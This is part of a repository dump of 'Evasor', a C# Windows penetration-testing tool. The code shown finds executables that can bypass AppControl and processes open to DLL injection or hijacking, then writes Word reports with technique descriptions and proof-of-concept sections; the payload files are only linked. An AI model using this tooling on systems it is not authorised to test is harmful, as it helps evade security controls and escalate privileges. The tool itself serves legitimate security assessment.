exitcode = OpenProcessScan(executible, string.Empty); 1355 | if 
(exitcode == -1) 1356 | { 1357 | Console.Write(executible); 1358 | list_of_available_executables_to_bypass_appControl.Add(executible); 1359 | Console.ForegroundColor = ConsoleColor.Green; 1360 | Console.Write(" can bypass"); 1361 | Console.ForegroundColor = ConsoleColor.Gray; 1362 | Console.WriteLine(" APP CONTROL "); 1363 | } 1364 | else 1365 | { 1366 | Console.Write(executible); 1367 | Console.ForegroundColor = ConsoleColor.Red; 1368 | Console.Write(" can't bypass"); 1369 | Console.ForegroundColor = ConsoleColor.Gray; 1370 | Console.WriteLine(" APP CONTROL "); 1371 | } 1372 | } 1373 | } 1374 | } 1375 | } 1376 | -------------------------------------------------------------------------------- /Evasor/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("Evasor")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Evasor")] 13 | [assembly: AssemblyCopyright("Copyright © 2020")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 
20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("1c8849ef-ad09-4727-bf81-1f777bd1aef8")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Evasor/Refrence_DLLs_to_be_added to the project/Microsoft.Office.Interop.Word.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/Refrence_DLLs_to_be_added to the project/Microsoft.Office.Interop.Word.dll -------------------------------------------------------------------------------- /Evasor/Refrence_DLLs_to_be_added to the project/Newtonsoft.Json.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/Refrence_DLLs_to_be_added to the project/Newtonsoft.Json.dll -------------------------------------------------------------------------------- /Evasor/Refrence_DLLs_to_be_added to the project/System.Data.SQLite.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/Refrence_DLLs_to_be_added to the project/System.Data.SQLite.dll -------------------------------------------------------------------------------- /Evasor/Refrence_DLLs_to_be_added to the 
project/System.Management.Automation.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/Refrence_DLLs_to_be_added to the project/System.Management.Automation.dll -------------------------------------------------------------------------------- /Evasor/Report.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.Office.Interop.Word; 2 | using System; 3 | using System.Collections.Generic; 4 | using System.Diagnostics; 5 | using System.IO; 6 | using System.Linq; 7 | using System.Text; 8 | using System.Threading.Tasks; 9 | 10 | namespace Evasor 11 | { 12 | public static class Report 13 | { 14 | static string Technical_Details = string.Empty; 15 | static string Issues = string.Empty; 16 | static string Recommendations_for_mitigation = string.Empty; 17 | static string Refrences = string.Empty; 18 | static string Proof_of_Concept = string.Empty; 19 | static string apps = string.Empty; 20 | static string apps_h = string.Empty; 21 | static string apps_r = string.Empty; 22 | static string pocs_and_pic = string.Empty; 23 | 24 | public static void Scan_Vulnerable_Process_To_DLL_Injection(List i_Results, List i_Pocs, List i_Pics) 25 | { 26 | Technical_Details = @"DLL injection is a technique which allows an attacker to run arbitrary code in the context of the address space of another process. If this process is running with excessive privileges then it could be abused by an attacker in order to execute malicious code in the form of a DLL file in order to elevate privileges or migrating to the target process in order to persist the open session to the target or to abuse the process ability to access is folder resources. 
Specifically, this technique follows the steps below: 27 | • A DLL needs to be dropped into the disk 28 | • The “CreateRemoteThread” calls the “LoadLibrary” 29 | • The reflective loader function will try to find the Process Environment Block (PEB) of the target process using the appropriate CPU register and from that will try to find the address in memory of kernel32dll and any other required libraries. 30 | • Discovery of the memory addresses of required API functions such as LoadLibraryA, GetProcAddress, and VirtualAlloc. The functions above will be used to properly load the DLL into memory and call its entry point DllMain which will execute the DLL. 31 | "; 32 | Refrences = @"https://pentestlab.blog/2017/04/04/dll-injection/"; 33 | foreach (string app in i_Results) 34 | { 35 | string[] subPaths = app.Split('^'); 36 | apps += subPaths[0] + " Owner:" + subPaths[2] + "\r\n"; 37 | } 38 | 39 | for (int i = 0; i < i_Pocs.Count; i++) 40 | { 41 | pocs_and_pic += i_Pocs[i] + "\r\n" + i_Pics[i] + "\r\n"; 42 | } 43 | 44 | Issues = @"We had found that we can inject DLL's to the following Process:" + "\r\n" + apps; 45 | Recommendations_for_mitigation = "None"; 46 | Proof_of_Concept = "Conducted at " + DateTime.Now.ToString() + " -As you can see typing at the RUN text-box the following Proof of concept will result with process being DLL injected to them. \r\n" + pocs_and_pic; 47 | create_word_report(Technical_Details, Issues, Refrences, Recommendations_for_mitigation, Proof_of_Concept, i_Pics, "3.DLL injection", "3"); 48 | ResetArguments(); 49 | } 50 | 51 | public static void Scan_For_Executibles_That_Can_Bypass_Windows_AppControl(List i_Results, List i_Pocs, List i_Pics) 52 | { 53 | Technical_Details = @"The goal of this test is to check the most common techniques to bypass AppControl restrictions and block rules. This test contains a complete list of all known bypasses. 
Since AppControl rules can be configured in different ways it makes sense to check them all."; 54 | Refrences = @"https://github.com/milkdevil/UltimateAppLockerByPassList"; 55 | foreach (string app in i_Results) 56 | { 57 | apps += app + "\r\n"; 58 | } 59 | for (int i = 0; i < i_Pocs.Count; i++) 60 | { 61 | pocs_and_pic += i_Pocs[i] + "\r\n" + i_Pics[i] + "\r\n"; 62 | } 63 | Issues = @"We had found that we can execute the following applications which can be used to bypass windows AppControl restriction block applications:" + "\r\n" + apps; 64 | Recommendations_for_mitigation = "Configure the OS not to allow running those applications!!!"; 65 | Proof_of_Concept = "Conducted at " + DateTime.Now.ToString() + "- As you can see typing at the RUN text-box the following Proof of concept will bypass AppControl restricted rules. \r\n" + pocs_and_pic; 66 | create_word_report(Technical_Details, Issues, Refrences, Recommendations_for_mitigation, Proof_of_Concept, i_Pics, "1.AppControl restriction rules bypass", "1"); 67 | ResetArguments(); 68 | } 69 | 70 | public static void Scan_for_Process_vulnerable_to_DLL_hijack_DLL_replacement(List i_Results1, List i_Results2, List i_Pocs, List i_Pics) 71 | { 72 | Technical_Details = @"In Windows environments when an application or a service is starting it looks for a number of DLL’s in order to function properly. If these DLL’s doesn’t exist or are implemented in an insecure way (DLL’s are called without using a fully qualified path) then it is possible to escalate privileges by forcing the application to load and execute a malicious DLL file. It should be noted that when an application needs to load a DLL it will go through the following order: 73 | The directory from which the application is loaded 74 | C:\Windows\System32 75 | C:\Windows\System 76 | C:\Windows 77 | The current working directory 78 | Directories in the system PATH environment variable Directories in the user PATH environment variable. 
79 | "; 80 | Refrences = @"https://pentestlab.blog/2017/03/27/dll-hijacking/"; 81 | foreach (string app in i_Results1) 82 | { 83 | string[] subPaths = app.Split('^'); 84 | apps_h += subPaths[1] + "\r\n"; 85 | } 86 | foreach (string app in i_Results2) 87 | { 88 | string[] subPaths = app.Split('^'); 89 | apps_r += subPaths[1] + "\r\n"; 90 | } 91 | for (int i = 0; i < i_Pocs.Count; i++) 92 | { 93 | pocs_and_pic += i_Pocs[i] + "\r\n" + i_Pics[i] + "\r\n"; 94 | } 95 | Issues = @"We had found that we can hijack/replace the following DLL’s:" + "\r\n" + apps_h + "\r\n" + apps_r; 96 | Recommendations_for_mitigation = "None!!!"; 97 | Proof_of_Concept = "Conducted at " + DateTime.Now.ToString() + " -As you can see, making the following will result with DLL Hijack attack.\r\n" + pocs_and_pic; 98 | create_word_report(Technical_Details, Issues, Refrences, Recommendations_for_mitigation, Proof_of_Concept, i_Pics, "2.DLL Hijacking", "2"); 99 | ResetArguments(); 100 | } 101 | 102 | public static void Scan_for_resource_hijacking_files() 103 | { 104 | Technical_Details = @"In this test we search for files on all the disk that can be abuesd in order to gain privlige eascalation by examining the content of all xml,config,json,bat,cmd,ps1,vbs,ini,js,exe,dll,mui,msi,yaml,lib,inf files exists on the disk and checks if it contains paths to other xml,config,json,bat,cmd,ps1,vbs,ini,js,exe,dll,mui,msi,yaml,lib,inf files and checks if there are premonitions to edit the file, by that it can hijack the resource and gain privlige escalation."; 105 | Refrences = "None."; 106 | } 107 | 108 | public static void ResetArguments() 109 | { 110 | Technical_Details = string.Empty; 111 | Issues = string.Empty; 112 | Recommendations_for_mitigation = string.Empty; 113 | Refrences = string.Empty; 114 | Proof_of_Concept = string.Empty; 115 | apps = string.Empty; 116 | apps_h = string.Empty; 117 | apps_r = string.Empty; 118 | pocs_and_pic = string.Empty; 119 | } 120 | 121 | 122 | public static void 
Merge(string[] filesToMerge, string outputFilename, bool insertPageBreaks) 123 | { 124 | //object defaultTemplate = documentTemplate; 125 | object missing = System.Type.Missing; 126 | object pageBreak = Microsoft.Office.Interop.Word.WdBreakType.wdSectionBreakNextPage; 127 | object outputFile = outputFilename; 128 | 129 | // Create a new Word application 130 | Microsoft.Office.Interop.Word._Application wordApplication = new Microsoft.Office.Interop.Word.Application(); 131 | 132 | try 133 | { 134 | // Create a new file based on our template 135 | Microsoft.Office.Interop.Word.Document wordDocument = wordApplication.Documents.Add( 136 | ref missing 137 | , ref missing 138 | , ref missing 139 | , ref missing); 140 | 141 | // Make a Word selection object. 142 | Microsoft.Office.Interop.Word.Selection selection = wordApplication.Selection; 143 | 144 | //Count the number of documents to insert; 145 | int documentCount = filesToMerge.Length; 146 | 147 | //A counter that signals that we shoudn't insert a page break at the end of document. 148 | int breakStop = 0; 149 | 150 | // Loop thru each of the Word documents 151 | foreach (string file in filesToMerge) 152 | { 153 | breakStop++; 154 | // Insert the files to our template 155 | selection.InsertFile( 156 | file 157 | , ref missing 158 | , ref missing 159 | , ref missing 160 | , ref missing); 161 | 162 | //Do we want page breaks added after each documents? 163 | if (insertPageBreaks && breakStop != documentCount) 164 | { 165 | selection.InsertBreak(ref pageBreak); 166 | } 167 | } 168 | 169 | // Save the document to it's output file. 170 | wordDocument.SaveAs( 171 | ref outputFile 172 | , ref missing 173 | , ref missing 174 | , ref missing 175 | , ref missing 176 | , ref missing 177 | , ref missing 178 | , ref missing 179 | , ref missing 180 | , ref missing 181 | , ref missing 182 | , ref missing 183 | , ref missing 184 | , ref missing 185 | , ref missing 186 | , ref missing); 187 | 188 | // Clean up! 
189 | wordDocument = null; 190 | } 191 | catch (Exception ex) 192 | { 193 | //I didn't include a default error handler so i'm just throwing the error 194 | throw ex; 195 | } 196 | finally 197 | { 198 | // Finally, Close our Word application 199 | wordApplication.Quit(ref missing, ref missing, ref missing); 200 | } 201 | } 202 | 203 | 204 | public static void create_word_report(string i_Technical_Details, string i_Issues, string i_References, string i_Recommendations_for_mitigation, string i_Proof_of_Concept, List i_pic, string vector, string test_number) 205 | { 206 | try 207 | { 208 | //Create an instance for word app 209 | Microsoft.Office.Interop.Word.Application winword = new Microsoft.Office.Interop.Word.Application(); 210 | //Set animation status for word application 211 | winword.ShowAnimation = false; 212 | //Set status for word application is to be visible or not. 213 | winword.Visible = false; 214 | //Create a missing variable for missing value 215 | object missing = System.Reflection.Missing.Value; 216 | //Create a new document 217 | Microsoft.Office.Interop.Word.Document document = winword.Documents.Add(ref missing, ref missing, ref missing, ref missing); 218 | //Add header into the document 219 | foreach (Microsoft.Office.Interop.Word.Section section in document.Sections) 220 | { 221 | //Get the header range and add the header details. 
222 | Microsoft.Office.Interop.Word.Range headerRange = section.Headers[Microsoft.Office.Interop.Word.WdHeaderFooterIndex.wdHeaderFooterPrimary].Range; 223 | headerRange.Fields.Add(headerRange, Microsoft.Office.Interop.Word.WdFieldType.wdFieldPage); 224 | headerRange.ParagraphFormat.Alignment = Microsoft.Office.Interop.Word.WdParagraphAlignment.wdAlignParagraphCenter; 225 | headerRange.Font.ColorIndex = Microsoft.Office.Interop.Word.WdColorIndex.wdGray25; 226 | headerRange.Font.Size = 10; 227 | headerRange.Text = "-Confidential-"; 228 | } 229 | 230 | string style = "Normal"; 231 | object objstyle = style; 232 | 233 | //Add paragraph with Heading 1 style 234 | Microsoft.Office.Interop.Word.Paragraph para1 = document.Content.Paragraphs.Add(ref missing); 235 | object styleHeading1 = "Heading 1"; 236 | para1.Range.set_Style(ref styleHeading1); 237 | para1.Range.Text = vector; 238 | para1.Range.InsertParagraphAfter(); 239 | Microsoft.Office.Interop.Word.Range r1 = para1.Range; 240 | r1.set_Style(ref objstyle); 241 | 242 | //Add paragraph with Heading 1 style 243 | Microsoft.Office.Interop.Word.Paragraph para2 = document.Content.Paragraphs.Add(ref missing); 244 | object styleHeading2 = "Heading 2"; 245 | para2.Range.set_Style(ref styleHeading2); 246 | para2.Range.Text = "Overall Risk Level:"; 247 | para2.Range.InsertParagraphAfter(); 248 | Microsoft.Office.Interop.Word.Range r2 = para2.Range; 249 | r2.set_Style(ref objstyle); 250 | r2.Text = ""; 251 | 252 | //Add paragraph with Heading 1 style 253 | Microsoft.Office.Interop.Word.Paragraph para3 = document.Content.Paragraphs.Add(ref missing); 254 | object styleHeading3 = "Heading 4"; 255 | para3.Range.set_Style(ref styleHeading3); 256 | para3.Range.Text = "Technical Details:"; 257 | para3.Range.InsertParagraphAfter(); 258 | Microsoft.Office.Interop.Word.Range r3 = para3.Range; 259 | r3.set_Style(ref objstyle); 260 | r3.Text = i_Technical_Details; 261 | r3.InsertParagraphAfter(); 262 | 263 | 264 | //Add paragraph with 
Heading 2 style 265 | Microsoft.Office.Interop.Word.Paragraph para4 = document.Content.Paragraphs.Add(ref missing); 266 | object styleHeading4 = "Heading 4"; 267 | para4.Range.set_Style(ref styleHeading4); 268 | para4.Range.Text = "Issues:"; 269 | para4.Range.InsertParagraphAfter(); 270 | Microsoft.Office.Interop.Word.Range r4 = para4.Range; 271 | r4.set_Style(ref objstyle); 272 | r4.Text = i_Issues; 273 | r4.InsertParagraphAfter(); 274 | 275 | 276 | //Add paragraph with Heading 1 style 277 | Microsoft.Office.Interop.Word.Paragraph para5 = document.Content.Paragraphs.Add(ref missing); 278 | object styleHeading5 = "Heading 4"; 279 | para5.Range.set_Style(ref styleHeading5); 280 | para5.Range.Text = "References:"; 281 | para5.Range.InsertParagraphAfter(); 282 | Microsoft.Office.Interop.Word.Range r5 = para5.Range; 283 | r5.set_Style(ref objstyle); 284 | r5.Text = i_References; 285 | r5.InsertParagraphAfter(); 286 | 287 | //Add paragraph with Heading 1 style 288 | Microsoft.Office.Interop.Word.Paragraph para6 = document.Content.Paragraphs.Add(ref missing); 289 | object styleHeading6 = "Heading 4"; 290 | para6.Range.set_Style(ref styleHeading6); 291 | para6.Range.Text = "Recommendations for mitigation:"; 292 | para6.Range.InsertParagraphAfter(); 293 | Microsoft.Office.Interop.Word.Range r6 = para6.Range; 294 | r6.set_Style(ref objstyle); 295 | r6.Text = i_Recommendations_for_mitigation; 296 | r6.InsertParagraphAfter(); 297 | 298 | //Add paragraph with Heading 1 style 299 | Microsoft.Office.Interop.Word.Paragraph para7 = document.Content.Paragraphs.Add(ref missing); 300 | object styleHeading7 = "Heading 4"; 301 | para7.Range.set_Style(ref styleHeading7); 302 | para7.Range.Text = "Proof of Concept:"; 303 | para7.Range.InsertParagraphAfter(); 304 | Microsoft.Office.Interop.Word.Range r7 = para7.Range; 305 | r7.set_Style(ref objstyle); 306 | r7.Text = i_Proof_of_Concept; 307 | r7.InsertParagraphAfter(); 308 | 309 | for (int i = i_pic.Count - 1; 0 <= i; i--) 310 | { 311 | 
string fileName = i_pic[i]; //the picture file to be inserted 312 | Object oMissed = para5.Range; //the position you want to insert 313 | Object oLinkToFile = false; //default 314 | Object oSaveWithDocument = true;//default 315 | document.InlineShapes.AddPicture(fileName, ref oLinkToFile, ref oSaveWithDocument, ref oMissed); 316 | } 317 | //Save the document 318 | object filename = Path.GetDirectoryName(Path.GetFullPath(Process.GetCurrentProcess().ProcessName + ".exe")) + @"\TEMP\"+ Process.GetCurrentProcess().ProcessName + "-" + test_number + "-Report.docx"; 319 | document.SaveAs2(ref filename); 320 | document.Close(ref missing, ref missing, ref missing); 321 | document = null; 322 | winword.Quit(ref missing, ref missing, ref missing); 323 | winword = null; 324 | } 325 | catch (Exception ex) 326 | { } 327 | } 328 | 329 | 330 | } 331 | } 332 | -------------------------------------------------------------------------------- /Evasor/ScreenCapture.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Drawing; 4 | using System.Linq; 5 | using System.Runtime.InteropServices; 6 | using System.Text; 7 | using System.Threading.Tasks; 8 | 9 | namespace Evasor 10 | { 11 | public class ScreenCapture 12 | { 13 | [DllImport("user32.dll")] 14 | private static extern IntPtr GetForegroundWindow(); 15 | 16 | [DllImport("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true)] 17 | public static extern IntPtr GetDesktopWindow(); 18 | 19 | [StructLayout(LayoutKind.Sequential)] 20 | private struct Rect 21 | { 22 | public int Left; 23 | public int Top; 24 | public int Right; 25 | public int Bottom; 26 | } 27 | 28 | [DllImport("user32.dll")] 29 | private static extern IntPtr GetWindowRect(IntPtr hWnd, ref Rect rect); 30 | 31 | public static Image CaptureDesktop() 32 | { 33 | return CaptureWindow(GetDesktopWindow()); 34 | } 35 | 36 | public static Bitmap CaptureActiveWindow() 37 | { 
38 | return CaptureWindow(GetForegroundWindow()); 39 | } 40 | 41 | public static Bitmap CaptureWindow(IntPtr handle) 42 | { 43 | var rect = new Rect(); 44 | GetWindowRect(handle, ref rect); 45 | var bounds = new Rectangle(rect.Left, rect.Top, rect.Right - rect.Left, rect.Bottom - rect.Top); 46 | var result = new Bitmap(bounds.Width, bounds.Height); 47 | 48 | using (var graphics = Graphics.FromImage(result)) 49 | { 50 | graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); 51 | } 52 | 53 | return result; 54 | } 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /Evasor/bin/Debug/DLLs/Shady.inf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shady.inf -------------------------------------------------------------------------------- /Evasor/bin/Debug/DLLs/Shell.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shell.cs -------------------------------------------------------------------------------- /Evasor/bin/Debug/DLLs/Shell.csproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shell.csproj -------------------------------------------------------------------------------- /Evasor/bin/Debug/DLLs/Shell.fsscript: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shell.fsscript -------------------------------------------------------------------------------- /Evasor/bin/Debug/DLLs/Shell.hta: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shell.hta -------------------------------------------------------------------------------- /Evasor/bin/Debug/DLLs/Shell.inf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shell.inf -------------------------------------------------------------------------------- /Evasor/bin/Debug/DLLs/Shell.rsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shell.rsp -------------------------------------------------------------------------------- /Evasor/bin/Debug/DLLs/Shell.sct: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shell.sct -------------------------------------------------------------------------------- /Evasor/bin/Debug/DLLs/Shell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shell.txt -------------------------------------------------------------------------------- /Evasor/bin/Debug/DLLs/Shell.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shell.vbs -------------------------------------------------------------------------------- /Evasor/bin/Debug/Evasor.exe.config: -------------------------------------------------------------------------------- 1 
| 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | -------------------------------------------------------------------------------- /Evasor/bin/Debug/Evasor.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/Evasor.pdb -------------------------------------------------------------------------------- /Evasor/bin/Debug/REPORT/Evasor-Report.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/REPORT/Evasor-Report.docx 
-------------------------------------------------------------------------------- /Evasor/bin/Debug/TEMP/Evasor-0-Report.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/TEMP/Evasor-0-Report.docx -------------------------------------------------------------------------------- /Evasor/bin/Debug/TEMP/Evasor-1-Report.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/TEMP/Evasor-1-Report.docx -------------------------------------------------------------------------------- /Evasor/bin/Debug/TEMP/Evasor-2-Report.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/TEMP/Evasor-2-Report.docx -------------------------------------------------------------------------------- /Evasor/bin/Debug/TEMP/Evasor-3-Report.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/TEMP/Evasor-3-Report.docx -------------------------------------------------------------------------------- /Evasor/bin/Debug/TEMP/Evasor-4-Report.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/TEMP/Evasor-4-Report.docx -------------------------------------------------------------------------------- /Evasor/bin/Debug/TEMP/~$nd0rArk-3-Report.docx: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/TEMP/~$nd0rArk-3-Report.docx -------------------------------------------------------------------------------- /Evasor/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Evasor/obj/Debug/Evasor.csproj.CopyComplete: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/obj/Debug/Evasor.csproj.CopyComplete -------------------------------------------------------------------------------- /Evasor/obj/Debug/Evasor.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 44b4d2b0e8e951dd6dc71fe16a5f85801b362121 2 | -------------------------------------------------------------------------------- /Evasor/obj/Debug/Evasor.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\arik\Desktop\Evasor\Evasor\obj\Debug\Evasor.csprojAssemblyReference.cache 2 | C:\Users\arik\Desktop\Evasor\Evasor\obj\Debug\Evasor.csproj.CoreCompileInputs.cache 3 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\Evasor.exe.config 4 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\Evasor.exe 5 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\Evasor.pdb 6 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\Microsoft.Win32.Primitives.dll 7 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\netstandard.dll 8 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.AppContext.dll 9 | 
C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Collections.Concurrent.dll 10 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Collections.dll 11 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Collections.NonGeneric.dll 12 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Collections.Specialized.dll 13 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.ComponentModel.dll 14 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.ComponentModel.EventBasedAsync.dll 15 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.ComponentModel.Primitives.dll 16 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.ComponentModel.TypeConverter.dll 17 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Console.dll 18 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Data.Common.dll 19 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Diagnostics.Contracts.dll 20 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Diagnostics.Debug.dll 21 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Diagnostics.FileVersionInfo.dll 22 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Diagnostics.Process.dll 23 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Diagnostics.StackTrace.dll 24 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Diagnostics.TextWriterTraceListener.dll 25 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Diagnostics.Tools.dll 26 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Diagnostics.TraceSource.dll 27 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Diagnostics.Tracing.dll 28 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Drawing.Primitives.dll 29 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Dynamic.Runtime.dll 30 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Globalization.Calendars.dll 31 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Globalization.dll 32 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Globalization.Extensions.dll 33 | 
